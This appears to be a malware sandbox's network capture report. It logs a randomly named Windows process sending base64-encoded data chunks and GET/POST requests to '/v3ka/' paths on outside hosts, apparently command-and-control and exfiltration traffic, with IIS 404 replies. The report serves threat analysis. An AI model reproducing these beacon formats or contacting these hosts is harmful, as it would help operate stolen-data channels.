OIyXy9B4OG7TYQUC7M5WbqmVhk75G6OKTPbIECmxRYNNo1QffEoYUckF4LNqwLfTt6pAYQR9FQN3yApKTo3EVkgaU58THJVhBhzqDIABmiApU+QpL0EzKj8/ka0hta1v3cqnvxuvaSNnE1euS/aUKobTk7WiKZTN9F+UTqlUeM2zUthmeX2u2a6VoIhliSPB1C7GPMqi10+/w7mgwM91tgp5w6hGJLCVpvHQlRoAcrv9PDaq2tPkzDBeBWad0tvLv9sNQaItIKErYdI9HKub1ynaF9V3zwoReMDiCNJWgF9T3c+chSQv50ep0fG5hO/0vDYCNAHYnfoi3bi35CAiCexJ8sZGHEOxc7Uxf1cUxentv5/+KXtU5kho3g6Y6DsTdgzP+WrtMEtpxq7LPZMGq5etblP8QC5tz0CMtf1lZnJeRzLuxX4gUDcBY/wxxFhn7ChjDcJP5jnhOmZJX6rMubY1BaHrr3cIUd4IXMhpnW8fiO5/vu70JEvO/fvLut9updX2cbaJjncbsVQ/7KW/YRxWpeQGVZUHO5HXMllANJQ6Sc16WO91Wp70oHwrmS0qAKiCjpFJDs2Q49jRAXuJbSjkNicjqecNTcVi2pVqRRewHbWuCw3wTlJE1f3VHfiG2t0xJSf5Bt5BEaPonnCypV8pJNpjkyQ15IGnkTIvF7V57iceAqUEgxHhdsOiMoGpExDGqCSKS3HWLzbYS2DI9NJwbDyq8oEw8fPRF7B3hk/8HjlUE75OUGr/jq9Bn2UwCGGA3dB4mzMxVAgT4D6khEWlrTAD22frm0wF/RNhZbShKyzNL32dF7V5SNPeQ2EwnyHZvBw/zBNGJWeaeCAVYgL2qYaVGGXa5yijwyJKa0tlp8HHpL54gZZ25vB0VNAwJLztuNnZ5tPaYQDBDOKfQ/bhyLYVC0v0FfEcaGoNgfvqcm
Feb 28, 2024 15:46:41.614516973 CET	3858	OUT	Data Raw: 32 50 75 76 45 7a 68 64 65 4f 31 70 35 61 4f 77 2f 41 6c 6f 66 72 57 50 50 50 67 61 41 2f 68 64 38 6e 31 69 53 52 75 72 55 34 78 4a 76 37 33 75 44 43 35 30 54 50 2b 2b 6f 75 6a 4f 56 48 66 62 59 64 78 68 54 69 43 48 52 78 6b 4c 52 42 6a 34 49 41 Data Ascii: 2PuvEzhdeO1p5aOw/AlofrWPPPgaA/hd8n1iSRurU4xJv73uDC50TP++oujOVHfbYdxhTiCHRxkLRBj4IAhVh3h+7OG4Y/UKxhzUKQ1MyKPyOhD4b3m/fSJfxfT4eCQszQyIy5nlBgJbZxDkYPkcHf5I0JDi5nPHTq0olBcTAFKubzF2owVuB4Pyc4vIbGLxVh1WrasO0kQh495jzQE+c9MOplsnCQGgoe0hg+OYf15lpoJ1T7W
Feb 28, 2024 15:46:41.931173086 CET	5144	OUT	Data Raw: 75 77 4a 6e 45 49 55 77 71 6e 70 63 68 56 56 4b 4f 2f 70 69 6f 61 67 46 6b 7a 42 4b 6a 53 42 53 33 7a 75 66 5a 73 57 41 36 4c 74 78 61 70 52 62 67 38 38 56 47 6f 61 70 31 71 50 6f 76 47 64 68 6e 7a 54 46 47 69 50 35 39 66 48 6a 79 6d 7a 50 5a 42 Data Ascii: uwJnEIUwqnpchVVKO/pioagFkzBKjSBS3zufZsWA6LtxapRbg88VGoap1qPovGdhnzTFGiP59fHjymzPZBwjHB9Ukt7aUPNaP1T0pMvLqIT9ZJl5S2CKXfr72+NiD21ciFH8DLNgRzAa5lA8roKvACwOhamaXWmR3IBzGKtYDXvG21z6od41zZVqmwVtXQ/8YzsNxCQGFfWGFnzo61qQAdru3DNK+s7VBKNTWQDsKTcMjVx8PZo
Feb 28, 2024 15:46:41.931222916 CET	6430	OUT	Data Raw: 4e 6b 41 77 45 2f 69 4a 68 51 72 52 2b 43 77 68 53 47 4d 74 43 41 4c 4e 34 70 4c 78 5a 53 6c 4a 54 55 7a 58 71 2b 42 33 30 6c 66 52 74 6c 59 38 46 70 4c 71 5a 6d 72 41 38 2f 33 54 52 79 41 47 47 55 54 50 58 48 53 69 31 77 6f 33 58 39 64 4e 4a 72 Data Ascii: NkAwE/iJhQrR+CwhSGMtCALN4pLxZSlJTUzXq+B30lfRtlY8FpLqZmrA8/3TRyAGGUTPXHSi1wo3X9dNJrlXVI9nvfRD1T6gCHf7Fn3ui+xhM0RM5TjMRpue0SM285PgAKZLTlH/0bYMZu3xeTaQHhB20zBbiEhRZDc+27Y/7+gkWYLV5w7WF91GVkoiysbksnIuAe/GQ/4j15JYY5YT7QF2OS7gz269ZnHPOlwSf3WAZH2zd+g
Feb 28, 2024 15:46:41.931269884 CET	5144	OUT	Data Raw: 66 58 72 52 69 55 49 49 47 2b 52 77 67 75 44 78 57 70 6c 73 74 33 51 74 50 45 66 4f 74 78 69 56 4a 48 65 6c 5a 31 7a 71 65 30 79 70 79 55 50 6f 49 6c 50 6a 2f 6c 59 52 6b 31 30 4c 65 4a 4f 39 65 39 55 44 51 77 43 57 72 38 41 76 4c 64 4e 48 59 38 Data Ascii: fXrRiUIIG+RwguDxWplst3QtPEfOtxiVJHelZ1zqe0ypyUPoIlPj/lYRk10LeJO9e9UDQwCWr8AvLdNHY82ysdHYoCD/GFFyYiPfTnOjCbr5sxChI/C79Z0WYFZlkq9O7xYxYQlp88Tu8lbpVIAE9X3BYFHC1z/pkkFkXiyndsbvVVjfvAf7YBo0z949AXQGMlp5fSgw/aOSpTsuD8q5Gw8RSa/c4rUODmB0iyGGKWzEVQUyagM
Feb 28, 2024 15:46:41.931438923 CET	3858	OUT	Data Raw: 43 57 56 69 64 64 4e 69 35 78 69 57 2b 68 6d 63 69 71 73 49 39 6a 6a 63 44 6a 4d 74 68 46 2f 79 56 56 36 4b 49 41 59 75 67 36 4c 41 62 70 51 45 50 44 71 64 52 35 78 55 48 59 61 72 76 59 4c 52 4b 55 37 30 2f 68 6e 77 56 58 55 46 7a 70 53 32 32 73 Data Ascii: CWViddNi5xiW+hmciqsI9jjcDjMthF/yVV6KIAYug6LAbpQEPDqdR5xUHYarvYLRKU70/hnwVXUFzpS22sEcsD5gDNvZkyynKHxXlJsUxGRJCGZvymR75POe39qkhftzHXYb5hNERMkVGveb0SWa/2bRiLCzX2RDdi4G/M2Ielhem6eD2XCFeEFvU8lCpZumRt92S+QqLK+HtuKG+GdnSOsaI0lgZKDBFsfxtVwWy4H90B/dePE
Feb 28, 2024 15:46:42.247823000 CET	1286	OUT	Data Raw: 68 4f 38 34 6d 66 62 6e 47 38 75 47 77 4c 71 72 48 74 78 4b 74 78 75 72 6a 51 4b 58 54 75 37 4b 2f 48 58 56 48 4f 34 70 46 37 61 35 59 63 43 50 69 4e 79 4a 57 46 5a 45 72 4d 55 35 50 67 6e 6c 4a 4d 73 56 64 72 49 5a 4b 65 33 43 56 75 57 36 6e 58 Data Ascii: hO84mfbnG8uGwLqrHtxKtxurjQKXTu7K/HXVHO4pF7a5YcCPiNyJWFZErMU5PgnlJMsVdrIZKe3CVuW6nX8+eCkyG4hozeB7zbceKiJmF9EMteUcYBY9cGMg+tPuJjCobo9qoFgVVgLU0YxE707BNIfKnx7D1mt3e9sO7Nd+cq8NUikF8tB5b69cYB8VHADSvSJ+jKmnQN2n6YN9M6vR9bD2q2E1VdyiR9ZQqegIDjb3ipr5iu4
Feb 28, 2024 15:46:42.247874975 CET	5144	OUT	Data Raw: 47 75 4e 38 49 42 65 6b 78 39 53 43 6c 4f 5a 38 51 49 66 42 6c 4e 6c 32 69 63 2f 64 44 6c 45 78 47 66 6a 56 2b 42 72 58 4c 47 4b 42 6c 62 6f 66 39 48 6d 45 70 65 51 34 72 73 7a 78 58 65 4f 64 43 59 32 49 6e 55 69 59 49 59 56 68 33 47 67 54 43 43 Data Ascii: GuN8IBekx9SClOZ8QIfBlNl2ic/dDlExGfjV+BrXLGKBlbof9HmEpeQ4rszxXeOdCY2InUiYIYVh3GgTCCp0qofl4+aDStqVOghwSQcj54h/ZA+xVrRVYstxMbx/XiV/eY6r5/DBkTREeFayrZHMGkOXr3XwnotBY/A77PlYRH5EnTcHqURKrL4RwHutROCHD1bj7Pd3/iFkKD3cMBDIBy2DXy8ugM+YgW88/bR4vSrBpMrOKpe
Feb 28, 2024 15:46:42.247922897 CET	6430	OUT	Data Raw: 38 52 71 79 56 33 47 6c 71 48 59 7a 6d 4b 77 4b 42 39 4c 48 4e 74 73 70 79 44 30 39 54 5a 6d 54 4a 56 75 6e 35 47 5a 64 7a 4a 46 73 6a 32 65 2b 48 4b 66 73 52 35 52 56 51 77 44 66 76 30 6d 4e 6d 42 55 69 70 62 70 44 45 62 54 49 79 62 2f 64 64 59 Data Ascii: 8RqyV3GlqHYzmKwKB9LHNtspyD09TZmTJVun5GZdzJFsj2e+HKfsR5RVQwDfv0mNmBUipbpDEbTIyb/ddY4+R4EX2lc9nGxPbyHKaKK6LUibLRG9nfTgeMn+4iRQ32aGZupH6MGKF93otdagrDzKYjENwsYXUVtZ6ZEI/dxJP6ThGyupz2YysHlF1rNWgSTiRnUt84JGIrKYQR/5oXocIUB8mNnTkbich7guAQoHN2gMOm08o2m
Feb 28, 2024 15:46:42.248090982 CET	2572	OUT	Data Raw: 7a 48 6a 48 67 31 32 2b 4c 51 30 6d 31 49 65 5a 2b 41 33 2b 55 31 42 4f 34 42 52 4f 35 36 6d 55 69 32 6f 70 41 43 76 7a 75 46 37 62 32 63 42 68 4f 5a 76 6c 45 54 4a 79 4b 46 6e 38 75 31 59 63 62 52 73 7a 67 37 4e 4b 4d 53 62 36 6f 62 44 45 68 44 Data Ascii: zHjHg12+LQ0m1IeZ+A3+U1BO4BRO56mUi2opACvzuF7b2cBhOZvlETJyKFn8u1YcbRszg7NKMSb6obDEhDCtAlsf+kvQGI53RPbJqRdzu6WuYADxBd+bTxP9/65wiRX03/MN9p9/7ZA6dPSyiVn4n6Iq5BEPMZY7byUbUUnJpDn6Oo5AyH/78WKeCJ5D1d4pQeSeLA22sq48Pyji02hn/tNl/EyiNoSqOXvM05hzbe/2a1Zl1K6
Feb 28, 2024 15:46:42.248262882 CET	9743	OUT	Data Raw: 46 59 39 75 72 4b 56 42 37 4b 62 68 31 31 34 49 75 30 66 58 73 42 31 54 4e 43 47 52 6d 65 45 76 32 51 62 6e 6f 5a 46 33 4e 69 5a 48 4f 43 38 5a 58 30 76 59 6e 73 70 48 71 4c 74 4a 33 34 55 53 53 71 79 75 74 35 34 4b 32 41 4d 4f 31 46 56 77 48 4d Data Ascii: FY9urKVB7Kbh114Iu0fXsB1TNCGRmeEv2QbnoZF3NiZHOC8ZX0vYnspHqLtJ34USSqyut54K2AMO1FVwHMh49Og/Kf5m4m1aVJZ6XL6+LCKBphJ1MsjWwM2ozgjApfcsnRFWPObL2+uW72Rmcn1ZBnUWvh0Ozk4kd0O+2vICNZ1yxa8aqfE68DwZhDE9TBlouh3mBSNHS23iqRbDmtRSDgi1p75vH2ntUozl6wbH3Uscu9CMiaH
Feb 28, 2024 15:46:42.565951109 CET	1286	IN	HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 28 Feb 2024 14:46:42 GMT Connection: close Content-Length: 4953 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 20 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 20 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;co

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.11.20	50255	62.149.128.45	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:46:44.457201958 CET	463	OUT	GET /v3ka/?nf8dPP8p=J4AzjciiJVojUGFh27YaXL+RVgWMKJW/z8Zu4GWgm/9FzWPCzEiuTS1rwMX9pE5r2vC14B8Wx1zW9w/trsCTKSg2AEld6ylXwESzvhKrq7BgnePnhQ/Ly5c=&L0=2tHtHNWXtBDdYR HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Host: www.clarycyber.com Connection: close User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Feb 28, 2024 15:46:44.777651072 CET	1286	IN	HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 28 Feb 2024 14:46:44 GMT Connection: close Content-Length: 5105 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 38 2e 35 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 7d 20 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 20 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 8.5 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;co
Feb 28, 2024 15:46:44.777693033 CET	1286	IN	Data Raw: 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 35 70 78 20 30 3b 20 0a 7d 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a Data Ascii: lor:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;
Feb 28, 2024 15:46:44.777723074 CET	1286	IN	Data Raw: 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 7d 20 0a 2d 2d 3e 20 0a 3c 2f 73 74 79 6c 65 3e 20 0a 20 0a 3c 2f 68 65 61 64 3e 20 0a 3c 62 6f 64 79 3e 20 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e Data Ascii: ;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is
Feb 28, 2024 15:46:44.777754068 CET	1286	IN	Data Raw: 3b 49 49 53 20 57 65 62 20 43 6f 72 65 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 3e 3c 74 68 3e 4e 6f 74 69 66 69 63 61 74 69 6f 6e 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 4d 61 70 52 65 71 Data Ascii: ;IIS Web Core</td></tr> <tr><th>Notification</th><td>   MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>   StaticFile</td></tr> <tr><th>Error Code</th><td>   0x8007000
Feb 28, 2024 15:46:45.096883059 CET	179	IN	Data Raw: 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e 6b 2f 3f 4c 69 6e 6b 49 44 3d 36 32 32 39 33 26 61 6d 70 3b 49 49 53 37 30 45 72 72 6f 72 3d 34 30 34 2c 30 2c 30 78 38 30 30 37 30 30 30 32 2c Data Ascii: ref="http://go.microsoft.com/fwlink/?LinkID=62293&IIS70Error=404,0,0x80070002,9600">View more information »</a></p> </fieldset> </div> </div> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.11.20	50256	91.195.240.19	80	1424	C:\Program Files (x86)\BWNPSyVEikXKQhEyMSntqjOiFQrxuqKaQxvfwAUNCbMREyWLKolYChTODl\XHYtgzYIOwxqJ.exe

Timestamp	Bytes transferred	Direction	Data
Feb 28, 2024 15:46:50.812330961 CET	742	OUT	POST /v3ka/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en Host: www.mvmusicfactory.org Origin: http://www.mvmusicfactory.org Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: max-age=0 Referer: http://www.mvmusicfactory.org/v3ka/ User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0 Data Raw: 6e 66 38 64 50 50 38 70 3d 68 74 70 65 5a 6c 51 35 56 2f 6b 73 36 41 49 2b 36 64 6c 67 79 4a 61 42 62 52 4d 4d 74 77 49 53 6d 73 62 51 68 53 69 54 34 6e 77 78 4b 36 69 48 6e 74 42 4e 6f 62 48 56 6f 4e 69 6b 42 64 4a 4f 6e 39 58 45 6a 54 5a 2b 31 53 50 45 4a 78 56 39 45 62 79 67 46 6c 76 54 4b 39 37 36 6a 54 38 63 64 61 61 59 6c 32 50 4c 45 72 6b 51 66 71 6e 4c 2b 70 6a 73 67 76 6b 2f 6e 6e 64 78 51 55 50 4e 46 35 2b 78 52 34 38 4b 58 35 6d 30 38 56 4c 63 43 69 39 4c 75 74 75 71 44 6e 76 39 34 69 57 6b 45 74 72 75 55 79 74 2b 4d 54 55 66 56 7a 4f 76 59 6b 71 78 30 50 32 50 2f 57 52 79 61 71 32 54 4e 77 3d 3d Data Ascii: 